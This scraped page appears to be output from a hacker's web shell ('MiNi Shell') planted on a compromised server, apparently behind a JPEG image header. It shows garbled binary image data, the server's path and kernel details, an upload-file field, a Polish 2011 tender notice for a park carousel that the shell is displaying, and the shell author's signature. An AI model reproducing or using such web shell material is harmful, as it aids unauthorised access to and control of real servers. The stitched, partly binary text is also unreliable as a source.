JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111216/334031-N-2011.html

<p class="kh_header"><b>Bydgoszcz: Dostawa wraz z montażem, transportem używanej karuzeli, nie starszej niż 2007 rok produkcji, o poziomej osi obrotu mogącej pracować jako urządzenie stacjonarne z możliwością przewozu, dostarczone do Leśnego Parku Kultury i Wypoczynku Myślęcinek w Bydgoszczy</b><br>
<b>Numer ogłoszenia: 334031 - 2011; data zamieszczenia: 16.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Leśny Park Kultury i Wypoczynku MYŚLĘCINEK Sp. z o.o. w Bydgoszczy , ul. Gdańska 173-175, 85-674 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3280009, faks 052 3280024.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.myslecinek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem, transportem używanej karuzeli, nie starszej niż 2007 rok produkcji, o poziomej osi obrotu mogącej pracować jako urządzenie stacjonarne z możliwością przewozu, dostarczone do Leśnego Parku Kultury i Wypoczynku Myślęcinek w Bydgoszczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W skład karuzeli wchodzą
- minimum dwie ławki (gondole),.
- minimum 10 miejsc siedzących dla pasażerów karuzeli
- minimum 1 hamulec ręczny
- minimum 1 wirnik karuzeli
- minimum 1 silnik elektryczny
- przyczepa transportowa umożliwiająca transport 
- konstrukcja ławek 
- przyczepa
Szczegółowy opis urządzenia:
Ławka (gondola) - miejsca siedzące dla minimum pięciu osób (w pojedynczej gondoli) , ruch wahadłowy gondoli lub obrotowy względem poziomu podstawy, w czasie pracy urządzenia w najwyższym punkcie położenia gondola musi się znajdować na wysokości minimum 5metrów od ziemi
Miejsca siedzące - każde miejsce siedzące musi być wyposażone w minimum 1        
  zabezpieczenie dla pasażera

Hamulec ręczny - hamulec umożliwiający zatrzymanie gondoli podczas ruchu obrotowego         
   wirnika w jednym położeniu

Wirnik karuzeli - wirnik karuzeli umożliwiający poziomą oś obrotu karuzeli 

Silnik elektryczny - silnik elektryczny asynchroniczny o mocy od 3 KW do 6 KW, z możliwością regulacji obrotów i zmianą kierunku obrotów. 
Zestaw elementów
- wszystkie elementy metalowe zabezpieczone podkładem antykorozyjnym i pokryte ręcznie        
  emalią olejno - wtalową, emalią alkaidową lub malowane proszkowo. 
- konstrukcja karuzeli posadowiona na przyczepie 
- karuzela po rozstawieniu zabezpieczona 4 podporami zabezpieczającymi jej stabilność
- krzesełka gondoli zabezpieczone w pasy bezpieczeństwa
- budka sterownicza umożliwiająca dobrą widoczność przez obsługę karuzeli w czasie pracy
  urządzenia
- dokumentacja techniczno-ruchowa karuzeli
- posiada aktualny odbiór Urzędu Dozoru Technicznego
- urządzenie przeznaczone dla użytkowników w wieku powyżej 8 lat
-  dowód rejestracyjny przyczepy z aktualnym przeglądem technicznym (jeżeli jest częścią urządzenia) 
W załączniku nr 7 i nr 8 podano przykładowy projekt karuzeli o poziomej osi obrotu. Dopuszcza się równoważne karuzele przy zachowaniu określonych w projekcie materiałów i funkcji oraz składu zestawu.
Wymiary karuzeli (zał. nr 7; zał. nr 8)
- urządzenie nie mniejsze niż 4,0m ale nie większe niż 8,0m - szerokość
- urządzenie nie mniejsze niż 7,0m ale nie większe niż 15,0m - długość
- urządzenie nie mniejsze niż 6,0m ale nie większe niż 13,0m - wysokość
Wygląd zewnętrzny karuzeli, stan techniczny
Urządzenie sprawne technicznie, wyremontowane, odnowione, cechujące się atrakcyjnym wyglądem zewnętrznym. Zamawiający po rozstrzygnięciu postępowania przetargowego wymaga przedstawienia propozycji projektów graficznych dot. wyglądu zewnętrznego. Projekty graficzne wyglądu karuzeli uzgadniane będą z Zamawiającym. 
Wszelkie koszty związane z dostarczeniem  i montażem karuzeli  o poziomej osi obrotu mogące pracować jako urządzenia stacjonarne lub przewoźne objętych przedmiotem zamówienia leżą po stronie Wykonawcy. 

Elementy wyposażenia karuzeli o poziomej osi obrotu mogącej pracować jako urządzenia stacjonarne lub przewoźne, będące przedmiotem zamówienia muszą posiadać wszelkie wymagane prawem atesty i  świadectwa dopuszczające je do obrotu na terytorium Rzeczypospolitej Polskiej. Wykonawca wyłoniony w drodze postępowania zobowiązany będzie dostarczyć w/w dokumenty przy odbiorze końcowym przedmiotu zamówienia.

Gwarancja minimum do 30 września 2012r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.30-8, 37.53.52.00-9, 37.53.50.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że w okresie ostatnich trzech lat przed upływem terminu składana ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dokonał minimum dwóch dostaw lub remontów urządzeń rekreacyjnych o wartości nie mniejszej niż 50.000,00 zł netto każda, wraz z załączonym dokumentem potwierdzającym, że prace te zostały wykonane lub są wykonywane należycie (referencje, protokoły odbioru). Wykaz należy sporządzić zgodnie ze wzorem stanowiącym załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.: a) posiada środki finansowe lub zdolność kredytową, w wysokości nie mniejszej niż 50.000,00 (słownie: sto tysięcy złotych 00/100) PLN b) posiada opłacone ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. W celu wykazania spełniania niniejszego warunku udziału w postępowaniu wg. art.22 ust.1, zgodnie ze wzorem oświadczenia stanowiącym Załącznik nr 2 do niniejszej SIWZ (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich), c) Zamawiający wymaga, by dostawa była zgoda o opisem przedmiotu zamówienia. W tym celu wykonawca ma obowiązek dołączyć do oferty wydruki graficzne i opis poszczególnych elementów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy (wg załącznika nr 1 do siwz). 2. Oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do siwz). - oświadczenie/a wykonawcy/ów o spełnianiu warunków określonych w art. 22 ust. 1 uPzp (zał. 2 do siwz) (przy czym oświadczenie to może w imieniu każdego z wykonawców /np. członków konsorcjum - wspólników spółki cywilnej/ złożyć pełnomocnik, jeżeli został do tego umocowany, ale jeżeli przedstawi wraz z ofertą oświadczenie/a wykonawcy/ów, złożone zgodnie z obowiązującymi go zasadami reprezentacji, obie formy spełniają wymagania określone przez uPzp) 3. Wykaz wykonanych dostaw urządzeń rozrywkowych o wartości nie mniejszej niż 50 000,00 zł netto każda.(załącznik nr 4 do SIWZ). 4. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy; wg załącznika nr 3. 5. Załączony w formie oświadczenia wykaz podwykonawców jeżeli Wykonawca będzie korzystał z pomocy podwykonawców. 6. Pełnomocnictwo do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy, jeżeli o udzielenie zamówienia wspólnie ubiega się kilku wykonawców (5.1)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.myslecinek.pl w zakładce przetargi/ogłoszenia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Marketingu Leśnego Parku Kultury i Wypoczynku Myślęcinek sp. z o.o. w Bydgoszczy, ul. Gdańska 173-175, 85-674 Bydgoszcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2011 godzina 09:00, miejsce: Sekretariat Leśnego Parku Kultury i Wypoczynku Myślęcinek sp. z o.o. w Bydgoszczy, ul. Gdańska 173-175, 85-674 Bydgoszcz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 22.01.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com